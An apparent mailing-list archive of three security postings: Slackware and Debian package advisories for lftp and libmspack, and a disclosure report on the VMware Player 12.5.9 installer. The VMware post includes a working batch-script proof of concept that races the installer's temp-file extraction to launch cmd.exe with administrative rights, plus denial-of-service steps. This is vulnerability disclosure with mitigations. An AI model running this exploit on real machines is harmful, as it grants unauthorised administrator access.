[slackware-security] lftp (SSA:2018-214-01)

2018-08-02 Thread Slackware Security Team 


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  lftp (SSA:2018-214-01)

New lftp packages are available for Slackware 14.0, 14.1, 14.2, and -current to
fix a security issue.


Here are the details from the Slackware 14.2 ChangeLog:
+--+
patches/packages/lftp-4.8.4-i586-1_slack14.2.txz:  Upgraded.
  It has been discovered that lftp up to and including version 4.8.3 does
  not properly sanitize remote file names, leading to a loss of integrity
  on the local system when reverse mirroring is used. A remote attacker
  may trick a user to use reverse mirroring on an attacker controlled FTP
  server, resulting in the removal of all files in the current working
  directory of the victim's system.
  For more information, see:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10916
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/lftp-4.8.4-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/lftp-4.8.4-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/lftp-4.8.4-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/lftp-4.8.4-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/lftp-4.8.4-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/lftp-4.8.4-x86_64-1_slack14.2.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/lftp-4.8.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/lftp-4.8.4-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
b303a9afed31b7e1e63fd89f97b930b9  lftp-4.8.4-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
5f9f3d0523f105f2b9208605a0f8ce8f  lftp-4.8.4-x86_64-1_slack14.0.txz

Slackware 14.1 package:
a8bc385e644200237999bdf998ebd6cd  lftp-4.8.4-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
7d12b70c48cba62ca3b4e76a6a14c5d2  lftp-4.8.4-x86_64-1_slack14.1.txz

Slackware 14.2 package:
52f999b2dd00680235b93dd8de488d49  lftp-4.8.4-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
0a90effcd6dea9f0957d8d72475d0d51  lftp-4.8.4-x86_64-1_slack14.2.txz

Slackware -current package:
c8bdc8b30de7eb688b832a20b23d8578  n/lftp-4.8.4-i586-1.txz

Slackware x86_64 -current package:
a1340ec3d270601cfb9c05379ddcf7df  n/lftp-4.8.4-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg lftp-4.8.4-i586-1_slack14.2.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++
-BEGIN PGP SIGNATURE-

iEYEARECAAYFAltjZkQACgkQakRjwEAQIjMzyQCff5GDd+V8XHstP7vRnevCKiO6
sBUAnjwfKaQic7sF5UYjLpRaWh927/38
=8IDa
-END PGP SIGNATURE-

[SECURITY] [DSA 4260-1] libmspack security update

2018-08-02 Thread Salvatore Bonaccorso 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4260-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
August 02, 2018   https://www.debian.org/security/faq
- -

Package: libmspack
CVE ID : CVE-2018-14679 CVE-2018-14680 CVE-2018-14681 CVE-2018-14682
Debian Bug : 904799 904800 904801 904802

Several vulnerabilities were discovered in libsmpack, a library used to
handle Microsoft compression formats. A remote attacker could craft
malicious CAB, CHM or KWAJ files and use these flaws to cause a denial
of service via application crash, or potentially execute arbitrary code.

For the stable distribution (stretch), these problems have been fixed in
version 0.5-1+deb9u2.

We recommend that you upgrade your libmspack packages.

For the detailed security status of libmspack please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/libmspack

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAltjchxfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0SH7w//aMohH/3ymPCXrXB3RR+NmXpAFeVWO6EbKW2g3J/YEZAWe/nssupxK6Ws
3s8eHYhFxbffpzonkyVQ7E8nfBtp3osUmd9Ir+T2ftzpuSfsCWYFhERpep8c5eAP
4l43UOB118A3fWmVc6i/44/gc0XCRVfWF/SfEofx20x4CQSCliuTHRrQVqudFkgF
SsqVwbcpKhiMvUH9eq8Csi0LRywLdz7rX6dEKJ131bxcUmPIP02/wwmHDJQcjbg/
EEyCVbEYYIrIJiUh58OF/OmBFTT1im6rCYmfeyrPiotacSBT5K1dorjvnUytFuO/
Yf/2I1tSEb325hoqx+958pGj0Y+4ubjIpRuvhV/rM4r9kKmQbW344dft2FTqKOp/
a6K+LuaobcqXf9qZC1E/EytJuZNl57pdRAiOTVt3szNSfT3WCHrLWf6ZwF6PwTII
HKmfvNPrmfSJI7KEKpmra9FW21jwAcYJL6Xt6LWPKoPVR52rJv1WMd84edsg2mGI
J0P62TOKv3ZaJvpBrQ+bkuFoBrQE10RN43iAzOWVqBnw1LxMqq2WOnxHpcYduOBr
VduZWPiA8sN9Ee1WrVUn/ct81yie9RxJ21SZZEnoFR3wpMqBsIzeNsB9ISMVtalv
TeCi0ZETyCgdFPs7jEIA8F2q0Gg9DgXtcjnc4aIkOSA5IOj0G1w=
=fFmf
-END PGP SIGNATURE-

Executable installers are vulnerable^WEVIL (case 55): escalation of privilege with VMware Player 12.5.9

2018-08-02 Thread Stefan Kanthak 
Hi @ll,

the executable installer of VMware Player 12.5.9, published in
January 2018, available from
,
is vulnerable.

JFTR: VMware Player 12.5.9 is the last version which runs on
  32-bit Windows, and the last to support older CPUs.


Although running with administrative privileges (its embedded
application manifest specifies "requireAdministrator"),
VMware-player-12.5.9-7535481.exe extracts files UNPROTECTED
into subdirectories of the user's %TEMP% directory for later
execution.
An UNPRIVILEGED process/user running under the same user
account can tamper with these unprotected files between their
creation and their use, resulting in escalation of privilege.


For this well-known and well-documented vulnerability see
 and
 plus
 and



Demonstrations/proof of concepts:
~

The POCs work on standard installations of Windows, where the
user account created during Windows Setup is used.

This precondition is typically met: according to Microsoft's
own security intelligence reports, about 1/2 to 3/4 of the
about 600 million Windows installations which send telemetry
data have only ONE active user account.
See 


A) "escalation of privilege":
-

1. create the following text file in an arbitrary directory:

   --- vmware12.cmd ---
   :LOOP1
   @If Not Exist 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x86.exe" Goto 
:LOOP1

   Copy NUL: 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\VMwarePlayer.msi"

   :LOOP2
   @If Not Exist 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x64.exe" Goto 
:LOOP2

   Copy "%COMSPEC%" 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x86.exe"

   :LOOP3
   Copy "%COMSPEC%" 
"%TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup\vcredist_x64.exe"
   If ERRORLEVEL 1 Goto :LOOP3
   --- EOF ---

2. fetch the executable installer VMware-player-12.5.9-7535481.exe;

3. start the batch script created in step 1, then run the executable
   installer: notice the error message from the Windows Installer,
   and the start of the command processor with administrative rights!


B) "denial of service":
---

1. add the NTFS "access control list entry" (D;OIIO;WP;;;WD) meaning
   "deny execution of files in this directory for everyone, inheritable
   to files in all subdirectories" to the user's %TEMP% directory;

2. fetch the executable installer VMware-player-12.5.9-7535481.exe
   and run it: admire the MISLEADING wrong error message
   "The installer could not load a required DLL"!


C) "denial of service":
---

1. create a(n empty) file
   %TEMP%\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup

2. create the directory C:\VMwareTemp and the (empty) file
   C:\VMwareTemp\{3932C891-5563-421D-B9C0-DEA6CB35F9F4}~setup

3. fetch the executable installer VMware-player-12.5.9-7535481.exe
   and run it: admire the MISLEADING wrong error message
   "Not enough space"!


Mitigations:


1. DON'T use executable installers; stay far away from such
   eternally vulnerable crap!

2. NEVER run executable installers from UNSAFE directories like
   "%USERPROFILE%\Downloads\" or "%TEMP%\"
   DISABLE execution of files (as shown above) in %USERPROFILE%!

3. Practice STRICT privilege separation: use a your privileged
   "Administrator" account (especially the account created during
   Windows setup) ONLY for administrative tasks, and COMPLETELY
   separate unprivileged user accounts, with elevation requests
   DISABLED. for your daily/regular work.


stay tuned
Stefan Kanthak


PS: also see 


Timeline:
~

2018-06-03vulnerability report(s) sent to vendor

2018-06-13vendor acknowledged receipt:
  "We will look into this and provide feedback in due course."

2018-06-14vendor replies:
  "It is my understanding that Workstation Player 12.x has
   since reached end of general support (in February of 2018)
   as per our Lifecycle Product Matrix

."

2018-08-02report published